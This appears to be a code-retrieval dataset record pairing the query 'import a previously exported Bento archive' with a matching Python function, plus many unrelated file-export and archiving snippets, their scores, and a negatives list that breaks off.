"def write_imp_ASCII(DT, lat_lon_r, BX, BY, BZ, Label,\n olat_olon_or, obsX, obsY, obsZ, obsInc, obsID,\n filename='impOut.zip'):\n\n# def write_antti(DT, Lat, Lon, BX, BY, BZ, Label,\n# obsLat, obsLon, obsInc, obsID,\n# dt_file = 'DateTime.txt.gz',\n# location_file = 'LatLon.txt.gz',\n# bx_file = 'BX.txt.gz',\n# by_file = 'BY.txt.gz',\n# bz_file = 'BZ.txt.gz',\n# station_file = 'Stations.txt.gz'):\n\n # unpack former tuple arguments (see PEP-3113)\n Lat, Lon, Rad = lat_lon_r\n obsLat, obsLon, obsRad = olat_olon_or\n\n # create a temporary directory\n tmpDir = tempfile.mkdtemp()\n\n # set filenames\n dt_file = os.path.join(tmpDir, 'DateTime.txt')\n location_file = os.path.join(tmpDir, 'LatLon.txt')\n bx_file = os.path.join(tmpDir, 'BX.txt')\n by_file = os.path.join(tmpDir, 'BY.txt')\n bz_file = os.path.join(tmpDir, 'BZ.txt')\n obx_file = os.path.join(tmpDir, 'obsBX.txt')\n oby_file = os.path.join(tmpDir, 'obsBY.txt')\n obz_file = os.path.join(tmpDir, 'obsBZ.txt')\n station_file = os.path.join(tmpDir, 'Stations.txt')\n\n # write out ASCII files\n _write_antti_datetime(DT, dt_file)\n _write_antti_location(Lat, Lon, Rad, Label, location_file)\n _write_antti_component(BX, 'X (northward) component', bx_file)\n _write_antti_component(BY, 'Y (eastward) component', by_file)\n _write_antti_component(BZ, 'Z (downward) component', bz_file)\n _write_antti_stations(obsLat, obsLon, obsRad, obsInc, obsID, station_file)\n\n # not a part of original ASCII format, but included for completeness\n _write_antti_component(obsX, 'observed X (northward) component', obx_file)\n _write_antti_component(obsY, 'observed Y (eastward) component', oby_file)\n _write_antti_component(obsZ, 'observed Z (downward) component', obz_file)\n\n # open up output zip file\n with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as outZip:\n outZip.write(dt_file, os.path.basename(dt_file))\n outZip.write(location_file, os.path.basename(location_file))\n outZip.write(bx_file, os.path.basename(bx_file))\n outZip.write(by_file, os.path.basename(by_file))\n outZip.write(bz_file, os.path.basename(bz_file))\n outZip.write(obx_file, os.path.basename(obx_file))\n outZip.write(oby_file, os.path.basename(oby_file))\n outZip.write(obz_file, os.path.basename(obz_file))\n outZip.write(station_file, os.path.basename(station_file))\n\n shutil.rmtree(tmpDir)",
"def save_object(obj, filename):\n\n result = pickle.dumps(obj)\n with gzip.GzipFile(filename, 'wb') as dest: dest.write(result)\n dest.close()",
"def export(request, slug):\n show = Show.objects.get(slug=slug)\n response = HttpResponse(show.data_file.read())\n response['Content-Disposition'] = f'attachment; filename={slug}.json'\n\n return response",
"def test_export_targz(self):\r\n resp = self.client.get(self.url, HTTP_ACCEPT='application/x-tgz')\r\n self._verify_export_succeeded(resp)",
"def pickle_to_file(obj, path):\n pickle.dump(obj, open(path, 'wb'))",
"def to_file(self, file_io):\n pickle.dump(self.__object, file_io)",
"def object_export(request, simulation, object_name):\n query = get_query(object_name, simulation)\n # To avoid conflict if two users export a file at the same time, we\n # generate a random name for the export file.\n seed = np.random.randint(10000)\n filename = '{0}/website_files/exports/{1}.tsv'.format(settings.BASE_DIR,\n seed)\n with codecs.open(filename, 'w', encoding='utf8') as f:\n if object_name == 'centroid':\n fields = ['id', 'name', 'x', 'y', 'db_id']\n elif object_name == 'crossing':\n fields = ['id', 'name', 'x', 'y', 'db_id']\n elif object_name == 'link':\n fields = ['id', 'name', 'origin', 'destination', 'lanes', 'length',\n 'speed', 'capacity', 'vdf']\n elif object_name == 'function':\n fields = ['id', 'expression']\n writer = csv.writer(f, delimiter='\\t')\n if object_name in ('centroid', 'crossing'):\n writer.writerow(['id', 'name', 'x', 'y', 'db_id'])\n values = query.values_list('user_id', 'name', 'x', 'y', 'id')\n elif object_name == 'function':\n writer.writerow(['id', 'name', 'expression'])\n values = query.values_list('user_id', 'name', 'expression')\n elif object_name == 'link':\n writer.writerow(['id', 'name', 'lanes', 'length', 'speed',\n 'capacity', 'function', 'origin', 'destination'])\n values = query.values_list('user_id', 'name', 'lanes', 'length',\n 'speed', 'capacity', 'vdf__user_id')\n # Origin and destination id must be converted to user_id.\n centroids = get_query('centroid', simulation)\n crossings = get_query('crossing', simulation)\n ids = list(centroids.values_list('id', 'user_id'))\n ids += list(crossings.values_list('id', 'user_id'))\n # Map id of nodes to their user_id.\n id_mapping = dict(ids)\n origins = query.values_list('origin', flat=True)\n origins = np.array([id_mapping[n] for n in origins])\n destinations = query.values_list('destination', flat=True)\n destinations = np.array([id_mapping[n] for n in destinations])\n # Add origin and destination user ids to the values array.\n origins = np.transpose([origins])\n destinations = np.transpose([destinations])\n values = np.hstack([values, origins, destinations])\n writer.writerows(values)\n with codecs.open(filename, 'r', encoding='utf8') as f:\n # Build a response to send a file.\n response = HttpResponse(f.read())\n response['content_type'] = 'text/tab-separated-values'\n response['Content-Disposition'] = \\\n 'attachement; filename={}.tsv'.format(metro_to_user(object_name))\n # We delete the export file to save disk space.\n os.remove(filename)\n return response",
"def export_file(self, hash, export_path):\n if os.path.exists(export_path):\n raise StashError('File exists.')\n source = open(self.tree.find(hash), 'rb')\n target = open(export_path, 'wb')\n while True:\n block = source.read(8192)\n if not block:\n break\n target.write(block)\n source.close()\n target.close()",
"def archive_log(self, f_in, filename):\n if not os.path.isdir('archived'):\n os.makedirs('archived')\n f_out = gzip.open('archived/'+filename+'.gz', 'wb')\n f_out.writelines(f_in)\n f_out.close()\n f_in.close()",
"def save_file(obj, file_path):\n with gzip.open(file_path, \"wb\") as fp:\n fp.write(json.dumps(obj).encode('utf-8'))",
"def archive_backup(self):\n\n # Archiving the Training script\n shutil.copyfile(self.script_path, self.save_path + '/0-' + os.path.basename(self.script_path))\n os.chmod(self.save_path + '/0-' + os.path.basename(self.script_path), 0o755)\n # Archiving the src folder\n pkg_path = os.path.dirname(arch_src)\n backup_path = os.path.join(self.save_path, 'src_backup')\n shutil.make_archive(backup_path, 'gztar', pkg_path)\n\n # Archiving the Environment Info\n env_info = collect_env.get_pretty_env_info()\n with open(self.save_path + '/env_info.txt', 'w') as f:\n f.write(env_info)",
"def export(self):\n\t\tif ( self.saveFileStr.get() not in self.saveDefault ):\n\t\t\t# Set the tempo\n\t\t\ttempoObject = tempo.MetronomeMark( None, \n\t\t\t\t\t\t\t\t\t\t\t\tint(self.tempo.get()), \n\t\t\t\t\t\t\t\t\t\t\t\tnote.QuarterNote() )\n\t\t\tself.transcribedPart.insert(tempoObject)\n\t\t\t\n\t\t\t# Write to disk\n\t\t\tsuccess = self.transcribedPart.write(fp=self.saveFile)\n\t\t\tif ( success ):\n\t\t\t\tsaveMsg = \"Your file has been saved to %s.\" % success\n\t\t\t\ttkMessageBox.showinfo(\"File saved!\", saveMsg )\n\t\telif ( self.saveFileStr.get() == \"\" ):\n\t\t\tself.saveFileStr.set(self.saveDefault)\t\t\n\t\t\tpass\n\t\telse:\n\t\t\t# Don't have a save location... should get that\n\t\t\tself.getSavePath()\n\t\t\tself.export()",
"def __init__(self, ase):\n self.bin = open(ase, 'wb')",
"def step_3b(browser):\n xml_file = '../../src/imio.project.pst/src/imio/project/pst/model/PST_eComptes_Export_201805V1.xsd'\n # select xml file\n file_field = browser.find(u'Document XML exporté depuis eComptes')\n with open(xml_file, 'r') as f:\n file_field.set('value', (f.read(), 'ecomptes_pst.xml'))\n # import xml file\n browser.find_button_by_label('Importer').click()\n # write browser contents\n # with open('browser_contents', 'w') as f:\n # f.write(browser.contents)",
"def save_to(self, f: BinaryIO):\n raise NotImplementedError",
"def write(self, object, content_type, to_file):\n return to_file",
"def put(self, obj):\n\n if obj is None:\n return\n\n assert os.path.exists(obj), f'path {obj} does not exist.'\n\n return shutil.make_archive(obj, 'tar', obj)",
"def zoo_import(name, head=''):\n net = gz.get_model(name, pretrained=True)\n export_block(head + name, net, preprocess=True)",
"def __gitCreateArchive(self):\n self.vcs.gitCreateArchive(self.project.getProjectPath())",
"def write_pickle_object_to_file(self, inpobj):\n with gzip.open('%s.tmp' % self.pickle_file, 'wb') as pkl_file:\n pickle.dump(inpobj, pkl_file, pickle.HIGHEST_PROTOCOL)\n run_command('mv %s.tmp %s' % (self.pickle_file, self.pickle_file))\n return True",
"def save2File(self, contents, filename):\n self.setup()\n fullpath = os.path.join(self.output_path, filename)\n f = open(fullpath, 'w')\n f.write(contents) # python will convert \\n to os.linesep\n f.close() # you can omit in most cases as the destructor will call it\n url = \"file://\" + fullpath\n return url",
"def testArchiveExport(self):\n\n archive = alembic.Abc.OArchive(\"iterator.abc\")\n for i in range(3):\n child = alembic.Abc.OObject(archive.getTop(), \"childObj\" + str(i))\n for j in range(3):\n gchild = alembic.Abc.OObject(child, \"grandChild\" + str(j))\n for k in range(3):\n cp = alembic.Abc.OCompoundProperty(gchild.getProperties(), \"prop\" + str(k))\n sp = alembic.Abc.OStringProperty(cp, \"scalar\")\n sp.setValue(\"a\")\n sp.setValue(\"b\")\n sp.setValue(\"c\")\n ap = alembic.Abc.OStringArrayProperty(cp, \"array\")\n stra = imath.StringArray(3)\n stra[0] = 'a'\n stra[1] = 'b'\n stra[2] = 'c'\n ap.setValue(stra)\n strb = imath.StringArray(2)\n strb[0] = 'd'\n strb[1] = 'e'\n ap.setValue(strb)\n strc = imath.StringArray(1)\n strc[0] = 'f'\n ap.setValue(strc)",
"def write_body_in_gz_file(self):\r\n if self.arguments['--out']:\r\n self.file = gzip.open(self.arguments['--out'] + '.gz', \"a+b\")\r\n for list_item in self.list_of_body_objects:\r\n self.file.write(list_item.line.encode('utf-8'))\r\n self.file.close()\r\n else:\r\n for list_item in self.list_of_body_objects:\r\n print(list_item.line.encode('utf-8'))\r\n\r\n self.file.close()",
"def exportModuleToFile(self, exportData):\n calcEngine = CalcEngine.factory(self.client_session)\n file_path = join(settings.MEDIA_ROOT, 'tmp', f'{exportData.moduleId}.ppl')\n if exportData.exportType != \"1\":\n storage = FileSystemStorage(\n join(settings.MEDIA_ROOT, 'models'))\n currentPath = self.client_session.modelInfo.uri\n folderPath = currentPath[:currentPath.rfind(os.path.sep)+1]\n file_path = join(\n storage.base_location, folderPath, f'{exportData.moduleId}.ppl')\n response = calcEngine.exportModule(exportData.moduleId, file_path)\n if response == 1:\n return open(file_path, 'rb'), file_path[file_path.rfind(os.path.sep)+1:]\n raise exceptions.NotAcceptable(\"Engine couldn't create file\")",
"def _cmd_export_nbo(args):\n cnarr = read_cna(args.filename)\n varr = load_het_snps(\n args.vcf,\n args.sample_id,\n args.normal_id,\n args.min_variant_depth,\n args.zygosity_freq,\n )\n table = export.export_nexus_ogt(cnarr, varr, args.min_weight)\n write_dataframe(args.output, table)",
"async def export(export_info: ExportDTO, background_tasks: BackgroundTasks):\n areas = get_areas_to_export(export_info)\n cameras = get_cameras_to_export(export_info, areas)\n temp_dir = tempfile.mkdtemp()\n export_filename = f\"export-{date.today()}.zip\"\n zip_path = os.path.join(temp_dir, export_filename)\n with ZipFile(zip_path, 'w', compression=ZIP_DEFLATED) as export_zip:\n for (cam_id, name) in cameras:\n export_camera_data_into_file(export_info, cam_id, name, export_zip)\n for (area_id, name) in areas:\n export_area_data_into_file(export_info, area_id, name, export_zip)\n background_tasks.add_task(clean_up_file, temp_dir)\n return FileResponse(zip_path, filename=export_filename)",
"def store(self, filename):",
"def exportFlatNode(self, exportData):\n file_path = join(\n settings.MEDIA_ROOT, 'tmp', f'{exportData.nodeId}.{exportData.fileFormat.lower()}')\n identifier = self.getNodeProperties(\n exportData.nodeId, [{\"name\": \"identifier\", \"value\": \"\"}])\n original = identifier['properties'][0]['value']\n calcEngine = CalcEngine.factory(self.client_session)\n response = calcEngine.exportFlatNode(\n original,\n exportData.numberFormat,\n exportData.columnFormat,\n file_path\n )\n if response == 1:\n if exportData.compressed == \"1\":\n temp = tempfile.SpooledTemporaryFile()\n with zipfile.ZipFile(temp, 'w', zipfile.ZIP_DEFLATED) as zfobj:\n zfobj.write(file_path)\n for zfile in zfobj.filelist:\n zfile.create_system = 0\n temp.seek(0)\n return temp, f'{file_path[file_path.rfind(os.path.sep)+1:file_path.rfind(\".\")]}.zip'\n return open(file_path, 'rb'), file_path[file_path.rfind(os.path.sep)+1:]\n raise exceptions.NotAcceptable(\"Engine couldn't create file\")",
"def object_export_save(simulation, object_name, dir):\n query = get_query(object_name, simulation)\n # To avoid conflict if two users export a file at the same time, we\n # generate a random name for the export file.\n filename = dir + '/' + object_name + 's.tsv'\n\n with codecs.open(filename, 'w', encoding='utf8') as f:\n if object_name == 'centroid':\n filename = dir + '/zones.tsv'\n fields = ['id', 'name', 'x', 'y', 'db_id']\n elif object_name == 'crossing':\n filename = dir + '/Intersections.tsv'\n fields = ['id', 'name', 'x', 'y', 'db_id']\n elif object_name == 'link':\n filename = dir + '/links.tsv'\n fields = ['id', 'name', 'origin', 'destination', 'lanes', 'length',\n 'speed', 'capacity', 'vdf']\n elif object_name == 'function':\n filename = dir + '/functions.tsv'\n fields = ['id', 'expression']\n writer = csv.writer(f, delimiter='\\t')\n if object_name in ('centroid', 'crossing'):\n writer.writerow(['id', 'name', 'x', 'y', 'db_id'])\n values = query.values_list('user_id', 'name', 'x', 'y', 'id')\n elif object_name == 'function':\n writer.writerow(['id', 'name', 'expression'])\n values = query.values_list('user_id', 'name', 'expression')\n elif object_name == 'link':\n writer.writerow(['id', 'name', 'lanes', 'length', 'speed',\n 'capacity', 'function', 'origin', 'destination'])\n values = query.values_list('user_id', 'name', 'lanes', 'length',\n 'speed', 'capacity', 'vdf__user_id')\n # Origin and destination id must be converted to user_id.\n centroids = get_query('centroid', simulation)\n crossings = get_query('crossing', simulation)\n ids = list(centroids.values_list('id', 'user_id'))\n ids += list(crossings.values_list('id', 'user_id'))\n # Map id of nodes to their user_id.\n id_mapping = dict(ids)\n origins = query.values_list('origin', flat=True)\n origins = np.array([id_mapping[n] for n in origins])\n destinations = query.values_list('destination', flat=True)\n destinations = np.array([id_mapping[n] for n in destinations])\n # Add origin and destination user ids to the values array.\n origins = np.transpose([origins])\n destinations = np.transpose([destinations])\n if values:\n values = np.hstack([values, origins, destinations])\n writer.writerows(values)\n\n return filename",
"def package():\n \n hou.hipFile.save()\n currentHip = hou.expandString(hou.hipFile.name())\n\n # create a temp directory we are going to fill with crap\n tempFilePath = tempfile.mkdtemp()\n \n otls = os.path.join(tempFilePath, \"otls\")\n os.mkdir(otls)\n files = os.path.join(tempFilePath, \"files\")\n os.mkdir(files)\n \n # Get all the external references to the hipfile\n fileOnDisk = hou.fileReferences()\n\n # loop and do what comes natural.\n for _file in fileOnDisk:\n\n parm = _file[0]\n filepath = _file[1]\n \n # if its a otl we need to store it.\n if filepath.endswith(\".otl\"):\n \n shutil.copy(hou.expandString(filepath), otls)\n \n else:\n \n if not os.path.isfile(hou.expandString(filepath)): \n \n continue\n \n # create a directory in files and save 1 file to that location\n tmpFileName = os.path.basename(hou.expandString(filepath))\n tmpFileDir = os.path.basename(os.path.dirname(hou.expandString(filepath)))\n path = os.path.join(files, tmpFileDir)\n \n if not os.path.isdir(path):\n \n os.mkdir(path)\n\n shutil.copy(hou.expandString(filepath), os.path.join(path, os.path.basename(hou.expandString(filepath))))\n\n try:\n \n if not parm.node().isLocked():\n \n parm.set(os.path.join(path.replace(tempFilePath, \"$HIP\"), tmpFileName))\n \n except hou.PermissionError: \n \n logging.warning(\"Error hardening parm :\" + str(parm.name()) + \"on node \" +parm.node().path())\n\n hou.hipFile.save(os.path.join(tempFilePath, os.path.basename(hou.expandString(hou.hipFile.name()))))\n # Load the source hipfile\n hou.hipFile.load(currentHip)\n \n # create a zipfile and package everything. then copy it to the home.\n zipfileLoc = zipdir(tempFilePath)\n shutil.move(zipfileLoc, os.path.join(hou.expandString(\"~\"), \"package.zip\"))\n shutil.rmtree(tempFilePath)",
"def _export_file(self, tmp_file, file_name):\n # Export the file\n archive_name = file_name + \".zip\"\n # switch into the temporary working directory to use relative path for zip\n os.chdir(self.temp_file_path)\n\n # Compression\n compressed_output_path = os.path.join(self.temp_file_path, archive_name)\n\n executable = \"/usr/bin/zip\"\n args = [\"-r\", archive_name, tmp_file]\n\n p = Process(exec_type=\"exec\",\n executable=executable,\n executable_params=args,\n stdin_source=None)\n\n self._update_num_of_steps(1)\n self._run_process(p)\n\n return archive_name, compressed_output_path",
"def save_obj(obj, path ):\n with open(path, 'wb') as f:\n pickle.dump(obj, f)",
"def save_to_fileobj(self, fileobj):\n writetags(fileobj, self.__dxftags__(), self.ENCODING)",
"def export(self, location):\n temp_dir = tempfile.mkdtemp('-export', 'pip-')\n self.unpack(temp_dir)\n try:\n call_subprocess(\n [self.cmd, 'archive', location],\n filter_stdout=self._filter, show_stdout=False, cwd=temp_dir)\n finally:\n rmtree(temp_dir)",
"def export(file_path):\n proxy_factory.export_proxies(open(file_path, 'w'))",
"def _pack_ex(file, names, cwd, implementor=None):\n assert isdir(cwd)\n if exists(file):\n console.rm(file)\n if not implementor: implementor = GzipTarredFile\n \n with console.cd(cwd):\n relnames = [relpath(name, cwd) for name in names]\n implementor.pack(relnames, file)\n return file",
"def export_to_file(self, fp, *args, **kwargs):\n with open(fp, 'w') as fh:\n self._to_str(fh)",
"def write_to_file(self, filename):\n self.octree.write(str.encode(filename))\n print(\"Save octomap to \"+filename)",
"def save_tar(self, target_dir):\n # type: (Text) -> None\n raise NotImplementedError(\"\")",
"def export_model(self, save_path: str, save_format: Optional[str] = None) -> None:",
"def write_to_file(name, obj):\n\n print 'writing structures to pickle'\n print '----------------------------'\n\n path = os.getcwd() + '/pickles/' + name + '.pkl'\n file = open(path, 'wb')\n pickle.dump(obj, file)\n file.close()",
"def make_zip_file(self, post_content):\n file_path, file_url = self.save_file(post_content['shortcode'] + '.zip', self.make_empty_zip())\n with ZipFile(file_path, 'w') as zipf:\n if post_content['igtv'] is True:\n zipf.writestr('igtv_link.txt', post_content['urls'][0][2])\n else:\n for url in post_content['urls']:\n zipf.writestr(self.get_content_name(url[2]), requests.get(url[2]).content)\n\n if 'text' in post_content:\n zipf.writestr('caption.txt', post_content['text'])\n return file_url",
"def export_file_dto(self, active_model, objs=[], type=''):\n dto_parser = DtoParser()\n objs2 = []\n for obj in objs:\n objs2 += dto_parser.parseJointPromotion(obj)\n\n doc_type_obj = self.env[\"edi.doc.type\"]\n doc_obj = self.env[\"edi.doc\"]\n doc_type = doc_type_obj.search([(\"code\", '=', \"dto\")])[0]\n last_dto_file = doc_obj.search([(\"doc_type\", '=', doc_type.id)],\n order=\"date desc\", limit=1)\n if last_dto_file:\n count = last_dto_file.count + 1\n else:\n count = 1\n\n tmp_name = \"export_dto.txt\"\n file_len = len(objs2)\n filename = \"%sDTO%s.%s\" % (self.env.user.company_id.frigo_code,\n str(file_len).zfill(4),\n str(count).zfill(4))\n templates_path = self.addons_path('frigo_edi') + os.sep + 'wizard' + \\\n os.sep + 'templates' + os.sep\n mylookup = TemplateLookup(input_encoding='utf-8',\n output_encoding='utf-8',\n encoding_errors='replace')\n tmp = Template(filename=templates_path + tmp_name,\n lookup=mylookup, default_filters=['decode.utf8'])\n\n doc = tmp.render_unicode(o=objs2, type_=type, datetime=datetime,\n user=self.env.user).encode('utf-8', 'replace')\n file_name = self[0].service_id.output_path + os.sep + filename\n f = file(file_name, 'w')\n f.write(doc)\n f.close()\n file_obj = self.create_doc(filename, file_name, doc_type)\n file_obj.count = count",
"def do_export(args):\n outfile_name = args.outfile_name.split('.')\n outfile_ext = 'txt'\n if len(outfile_name) > 1:\n (outfile_name, outfile_ext) = outfile_name\n else:\n outfile_name = outfile_name[0]\n\n secret = subprocess.Popen(['gpg', '--export-secret-key', args.keyid], stdout=subprocess.PIPE)\n paperkey = subprocess.check_output(['paperkey', '--output-type', 'raw'], stdin=secret.stdout)\n base64str = base64.b64encode(paperkey)\n chunks = chunk_up(base64str, args.numfiles)\n\n for i, chunk in enumerate(chunks):\n if args.png:\n (_, _, image) = qrencode.encode_scaled(chunk, int(args.size))\n image.save('%s%d.png' % (outfile_name, i+1), 'PNG')\n if args.base64:\n with open('%s%d.%s' % (outfile_name, i+1, outfile_ext), 'wb') as txt_file:\n txt_file.write(chunk)",
"def bmark_export(request):\r\n username = request.user.username\r\n\r\n bmark_list = BmarkMgr.user_dump(username)\r\n # log that the user exported this\r\n BmarkLog.export(username, username)\r\n\r\n def build_bmark(bmark):\r\n d = dict(bmark)\r\n d['hashed'] = dict(bmark.hashed)\r\n return _api_response(request, d)\r\n\r\n return _api_response(request, {\r\n 'bmarks': [build_bmark(bmark) for bmark in bmark_list],\r\n 'count': len(bmark_list),\r\n 'date': str(datetime.utcnow())\r\n })",
"def save_to_file(psbt, filename):\n raw = psbt.serialize()\n # convert to base64\n b64_psbt = b2a_base64(raw)\n # somehow b2a ends with \\n...\n if b64_psbt[-1:] == b\"\\n\":\n b64_psbt = b64_psbt[:-1]\n # print\n new_psbt = b64_psbt.decode('utf-8')\n print(\"Creating\", filename)\n with open(filename, 'wt') as outfile:\n print(new_psbt, file=outfile)",
"def create_backup_file(self, source_dir, archive_file):\n tar_file = tarfile.open(archive_file, 'w|gz')\n try:\n tar_file.add(source_dir)\n finally:\n tar_file.close()",
"def save(self):\n logging.debug(\"environment save entered\")\n filename = \"index.json\"\n content_dict = {}\n for fpname in self.footprints:\n # for now, just using the patteern ${footprint_name}-metadata for the name \n content_dict[fpname] = fpname\n content = json.dumps(content_dict)\n index = cf.store_object(self.container, filename, content) \n return True",
"def export(self, f, **kwargs):\n from .. import export\n\n return export.utils.package_export(f, self, **kwargs)",
"def to_file(self, path, family_root=\".edocache\"):\n\n path = Path(path)\n path.mkdir(exist_ok=True, parents=True)\n\n self.dataframe.to_csv(path / \"main.csv\", index=False)\n\n meta_dicts = []\n for pdf in self.metadata:\n pdf.family.save(family_root)\n meta_dicts.append(pdf.to_dict())\n\n with open(path / \"main.meta\", \"w\") as meta:\n json.dump(meta_dicts, meta)\n\n with open(path / \"main.state\", \"wb\") as state:\n pickle.dump(\n self.random_state, state, protocol=pickle.HIGHEST_PROTOCOL\n )\n\n return path",
"def import_bento_(bento_path: str) -> None: # type: ignore (not accessed)\n bento = import_bento(bento_path)\n logger.info(\"%s imported.\", bento)",
"def save_object(obj, file_name):\n file_name = osp.abspath(file_name)\n with open(file_name, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)",
"def export_wells(self, w, title):\r\n self._check_out(title)\r\n np.savez_compressed(os.path.join(self.out_dir, title, title), w)",
"def export_to(self, subdir, filetype='pdf'):\n file = self.partcode + '.' + filetype\n path = self.export_dir.joinpath(subdir).joinpath(file)\n print(str(path))\n self.doc.SaveAs(str(path), True)",
"def to_file(self, name, description, filename):\n self.to_stub(name, description).to_file(filename)",
"def persist_file(tweets, directory):\n log.debug(\"{} tweets to gzipped file\".format(len(tweets)))\n\n filename = join(directory, \"{}.gz\".format(date.today()))\n with gzip.open(filename, \"a+\") as f:\n write(tweets, f)",
"def to_file(self, file_path, smirnoff_data):\n pass",
"def write_file(self, filename, contents):\n blob = self.repo.create_blob(contents)\n self.index.add(pygit2.IndexEntry(filename, blob, pygit2.GIT_FILEMODE_BLOB))",
"def write_xyz_file(allxyz):\n if SAVEXYZ:\n print('+> Saving riverbed topography file...', end='')\n if MODE == 1:\n np.savetxt('kinoshita_topo.xyz', allxyz, fmt='%.6e')\n elif MODE == 2:\n np.savetxt(FNAME.rsplit('.', 1)[0] + '_topo.xyz', allxyz, fmt='%.6e')\n print(' [done]')",
"def exports():"
] | [
"0.60800993",
"0.60314316",
"0.599764",
"0.5991197",
"0.5971901",
"0.59628",
"0.59533924",
"0.5905716",
"0.5669903",
"0.5646166",
"0.5619919",
"0.5599178",
"0.55828655",
"0.5566471",
"0.55654246",
"0.5564186",
"0.5563321",
"0.55614084",
"0.5539148",
"0.55066764",
"0.5496924",
"0.54953384",
"0.5485054",
"0.5478849",
"0.5467897",
"0.54620713",
"0.54524106",
"0.54344577",
"0.5412332",
"0.54115105",
"0.5398005",
"0.5393902",
"0.53891456",
"0.53863394",
"0.5373733",
"0.5369641",
"0.5356247",
"0.53551376",
"0.53316855",
"0.5310304",
"0.5310286",
"0.52957225",
"0.5292685",
"0.52901495",
"0.5288155",
"0.5287477",
"0.52735543",
"0.525905",
"0.5247259",
"0.524327",
"0.5241658",
"0.5235135",
"0.5232922",
"0.52281195",
"0.5227636",
"0.52269846",
"0.52176476",
"0.5208832",
"0.52011317",
"0.5200705",
"0.51920754",
"0.5187802",
"0.51877904",
"0.5183159",
"0.5179211",
"0.51772666",
"0.51756465",
"0.5170228",
"0.5161491",
"0.5157263",
"0.51566875",
"0.51554966",
"0.51502484",
"0.51370054",
"0.51283103",
"0.5124281",
"0.51238596",
"0.5120066",
"0.5118897",
"0.5117707",
"0.5107276",
"0.51037246",
"0.5099288",
"0.50951797",
"0.5094843",
"0.50902444",
"0.5090068",
"0.5087257",
"0.5083099",
"0.50827366",
"0.5077388",
"0.50753033",
"0.50707304",
"0.5066804",
"0.50652045",
"0.50618714",
"0.5059406",
"0.5058343",
"0.50553566",
"0.5054852"
] | 0.73495036 | 0 |
Import a previously exported Bento archive file \b | def import_bento_(bento_path: str) -> None: # type: ignore (not accessed)
bento = import_bento(bento_path)
logger.info("%s imported.", bento) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def import_idb(self, idb_file):\n self.__run_import_script(file=idb_file, is_bin=False)",
"def zoo_import(name, head=''):\n net = gz.get_model(name, pretrained=True)\n export_block(head + name, net, preprocess=True)",
"def _import_bh_(self):",
"def import_bin(self, bin_file):\n self.__run_import_script(file=bin_file, is_bin=True)",
"def import_fusion_archive(filename, name=\"import\"):\n import_options = app().importManager.createFusionArchiveImportOptions(filename)\n\n document = app().importManager.importToNewDocument(import_options)\n imported_root = document.products[0].rootComponent\n\n bodies = []\n\n for body in imported_root.bRepBodies:\n bodies.append(brep().copy(body))\n for occurrence in imported_root.allOccurrences:\n for body in occurrence.bRepBodies:\n bodies.append(brep().copy(body))\n\n document.close(saveChanges=False)\n\n return BRepComponent(*bodies, name=name)",
"def importer():\n pass",
"def importar2(self):\n self.set_session()\n fileinfo = self.request.files['archivo'][0]\n fname = fileinfo['filename']\n extn = os.path.splitext(fname)[1]\n cname = str(uuid.uuid4()) + extn\n fh = open(\"server/common/resources/uploads/\" + cname, 'wb')\n fh.write(fileinfo['body'])\n fh.close()\n if extn == '.xlsx':\n mee = self.manager2(self.db).import_excel(cname)\n self.respond(message=mee['message'], success=mee['success'])\n else:\n self.respond(message='Formato de Archivo no aceptado¡¡', success=False)\n self.db.close()",
"def do_import(args):\n base64str = b''\n for infile_name in args.infile_names:\n if args.png:\n chunk = subprocess.check_output(['zbarimg', '--raw', infile_name])\n base64str += chunk\n elif args.base64:\n with open(infile_name, 'rb') as infile:\n chunk = infile.read()\n base64str += chunk\n\n raw = base64.b64decode(base64str)\n paperkey = subprocess.Popen(['paperkey', '--pubring', args.pubkey],\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE)\n (paperkey_stdout, _) = paperkey.communicate(raw)\n gpg = subprocess.Popen(['gpg', '--import'], stdin=subprocess.PIPE)\n gpg.communicate(paperkey_stdout)",
"def import_project_dump(self, key):",
"def do_import(export_filename, token):\r\n\r\n print 'Importing %s' % export_filename\r\n url = 'http://shank.trikeapps.com/mediawiki/index.php?title=Special:Import&action=submit'\r\n export_file = open(export_filename, 'rb')\r\n data = {'source': 'upload', 'log-comment': 'migrate_wiki.py script', 'xmlimport': export_file, 'editToken': token }\r\n feed = urllib2.urlopen(url, data)\r\n buf = feed.read()\r\n tree = etree.fromstring(buf, parser)\r\n nodes = tree.xpath('//div[@id=\"bodyContent\"]/p[2]')\r\n if not nodes or not nodes[0].text.startswith('Import finished!'):\r\n raise Exception('Failed to upload file, perhaps export file exceeds max size, try without the --at-once option')",
"def bimport(filepath, resource_path=None, imgi_import=True, imge_import=True, seq_import=True, mov_import=True, txti_import=True, txte_import=True,\r\n script_import=True, img_embed=False, txt_embed=None, skip_sha1=False, img_merge=True):\r\n \r\n filepath = bpy.path.abspath(filepath) #Ensure path is absolute\r\n \r\n if resource_path is None or resource_path.strip() == \"\":\r\n resource_path = None\r\n else:\r\n resource_path = bpy.path.abspath(resource_path) #Ensure path is absolute\r\n \r\n if path.splitext(filepath)[1] == \".blib\":\r\n try:\r\n archive = zf.ZipFile(filepath, 'r')\r\n except zf.BadZipFile:\r\n raise InvalidBlibFile(\"File is not a valid Blender library\")\r\n \r\n blib = True\r\n try:\r\n file_checksum, blibtype, file_version, compatible, *rest = archive.comment.decode(\"utf-8\").split(\" \")\r\n except ValueError:\r\n raise InvalidBlibFile(\"File is broken, missing meta-data\")\r\n \r\n compatible = Version(compatible)\r\n \r\n if blibtype == \"cycles\":\r\n if compatible <= version:\r\n if archive.testzip() is not None:\r\n raise InvalidBlibFile(\"File is broken\")\r\n else:\r\n if not skip_sha1:\r\n checksum = archive_sha1(archive)\r\n \r\n if not file_checksum == checksum.hexdigest():\r\n raise InvalidBlibFile(\"Checksum does not match, file may be broken or have been altered\\n\"\r\n 'Run with \"skip_sha1\" to ignore checksum')\r\n else:\r\n raise BlibVersionError(\"File has incompatible version of blib\")\r\n else:\r\n raise BlibTypeError(\"File is not a valid Cycles material\")\r\n try:\r\n xml_file = archive.open(\"structure.xml\", 'r')\r\n except KeyError:\r\n raise InvalidBlibFile(\"File is broken, missing structure XML\")\r\n tree = ET.ElementTree(file=xml_file)\r\n xml_file.close()\r\n xroot = tree.getroot()\r\n \r\n elif path.splitext(filepath)[1] == \".xml\":\r\n tree = ET.ElementTree(file=filepath)\r\n 